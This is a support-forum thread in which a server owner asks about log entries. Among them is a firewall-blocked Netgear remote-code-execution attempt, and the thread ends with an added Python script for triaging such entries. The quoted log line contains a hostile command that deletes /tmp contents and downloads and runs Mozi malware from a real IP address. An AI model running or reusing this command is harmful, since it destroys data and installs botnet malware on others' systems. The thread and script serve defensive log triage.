Should I be concerned about these log entries?

  • Should I be concerned about these log entries?

    - Anomaly detected in file /tmp/#sql_80d_2.MAD. Hidden from stats, but showing up on readdir. Possible kernel level rootkit.

    There were a number of these log entries around the same time:

    - IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||MV:rm -rf /tmp/*;wget http://202.88.219.141:50021/Mozi.m -O /tmp/netgear;sh netgear||

    I don’t see #sql_80d_2.MAD in /tmp

    It looks kind of nasty.

    Any insight would be appreciated.

    Thx
    G

  • #2
    Hello Glenn,
    Thank you for reaching out! These log entries mean that malware requests come to your server in a random order, and the Imunify360 firewall blocks these requests. It does not mean that your server has been compromised.
    You can also create a ticket https://cloudlinux.zendesk.com/hc/en-us/requests/new to check the infection of the server, and our malware analysts will be able to check for sure.
    If you have any other questions, feel free to ask here. Thank you for contacting us.


    • #3
      Thanks, Sergey, for your reply. My tech confirmed as well that it's nothing to worry about.
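
A triage check for WAF entries like the one quoted in the first post, added here as an example (it is not Imunify360 code and not part of the thread): it parses the `||`-delimited entry and reports whether the file the blocked command would have written exists on the host. The meaning of the `T`, `MVN` and `MV` labels is not stated on this page; the code assumes `MV` carries the matched request value, and the sample line is constructed with a documentation address.

```python
import os
import re
import shlex

# Constructed sample: same shape as the WAF entry in the first post, with the
# download host replaced by a documentation address (192.0.2.10).
SAMPLE = ("IM360 WAF: Netgear unauthenticated RCE||T:APACHE||MVN:ARGS:cmd||"
          "MV:rm -rf /tmp/*;wget http://192.0.2.10:50021/Mozi.m -O /tmp/netgear;sh netgear||")

def parse_waf_entry(line):
    """Split an entry into rule name and labelled fields (label meanings are assumed)."""
    head, sep, payload = line.strip().partition("||MV:")
    # Everything after MV: is the matched value; it may itself contain "||".
    if payload.endswith("||"):
        payload = payload[:-2]
    parts = head.split("||")
    entry = {"rule": parts[0].split(":", 1)[-1].strip(), "MV": payload if sep else ""}
    for part in parts[1:]:
        key, _, value = part.partition(":")
        entry[key] = value
    return entry

def drop_paths(payload):
    """Return files a blocked command string would have written via wget -O / curl -o."""
    paths = []
    for command in re.split(r"[;&|]+", payload):
        try:
            argv = shlex.split(command)
        except ValueError:          # unbalanced quotes in attacker-supplied input
            argv = command.split()
        if argv and argv[0] in ("wget", "curl"):
            flag = "-O" if argv[0] == "wget" else "-o"
            if flag in argv[:-1]:
                paths.append(argv[argv.index(flag) + 1])
    return paths

def triage(line):
    """Map each would-be dropped file to whether it exists on this host."""
    entry = parse_waf_entry(line)
    return {path: os.path.lexists(path) for path in drop_paths(entry["MV"])}

if __name__ == "__main__":
    print(parse_waf_entry(SAMPLE))
    for path, present in triage(SAMPLE).items():
        print(path, "PRESENT - investigate" if present else "absent")
```

A path reported as present is a reason to open the ticket mentioned in reply #2; an absent path is consistent with the request having been blocked.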
